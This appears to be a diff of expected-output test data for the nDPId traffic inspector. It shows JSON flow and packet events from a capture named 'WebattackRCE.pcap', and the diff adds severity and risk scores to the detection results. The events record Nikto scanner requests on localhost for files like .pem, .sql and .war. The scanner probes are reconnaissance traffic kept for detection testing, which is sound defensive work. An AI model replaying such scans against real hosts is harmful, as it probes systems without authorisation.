 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277118,"pkt":"AAAAAAAAAAAAAAAACABFAADBWpRAAEAG4aB\/AAABfwAAAcO+H5A50mLuGW1voYAYAED+tQAAAQEICp1m\/KadZvymR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277119,"pkt":"AAAAAAAAAAAAAAAACABFAADBojBAAEAGmgR\/AAABfwAAAcPAH5CoeZpSE7JOEoAYAED+tQAAAQEICp1m\/KedZvynR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277121,"pkt":"AAAAAAAAAAAAAAAACABFAADB1+ZAAEAGZE5\/AAABfwAAAcPCH5Dv1e9lqA5LqYAYAED+tQAAAQEICp1m\/KidZvyoR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277122,"pkt":"AAAAAAAAAAAAAAAACABFAADBr9xAAEAGjFh\/AAABfwAAAcPEH5A9f5dbU\/lctoAYAED+tQAAAQEICp1m\/KqdZvyqR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277123,"pkt":"AAAAAAAAAAAAAAAACABFAADAYAxAAEAG3Cl\/AAABfwAAAcPGH5DSd1iLatlmxYAYAED+tAAAAQEICp1m\/KudZvyrR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277126,"pkt":"AAAAAAAAAAAAAAAACABFAADA98ZAAEAGRG9\/AAABfwAAAcPIH5D1l89GxMECdIAYAED+tAAAAQEICp1m\/K6dZvytR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277127,"pkt":"AAAAAAAAAAAAAAAACABFAADBPaVAAEAG\/o9\/AAABfwAAAcPKH5CdTAUjrG8+WIAYAED+tQAAAQEICp1m\/K+dZvyvR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277128,"pkt":"AAAAAAAAAAAAAAAACABFAADBZB5AAEAG2BZ\/AAABfwAAAcPMH5CtKVyfkMJlVIAYAED+tQAAAQEICp1m\/LCdZvywR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277130,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JsdAAEAGFXJ\/AAABfwAAAcPOH5Ap0h5I7vzLNIAYAED+sQAAAQEICp1m\/LKdZvyyR0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
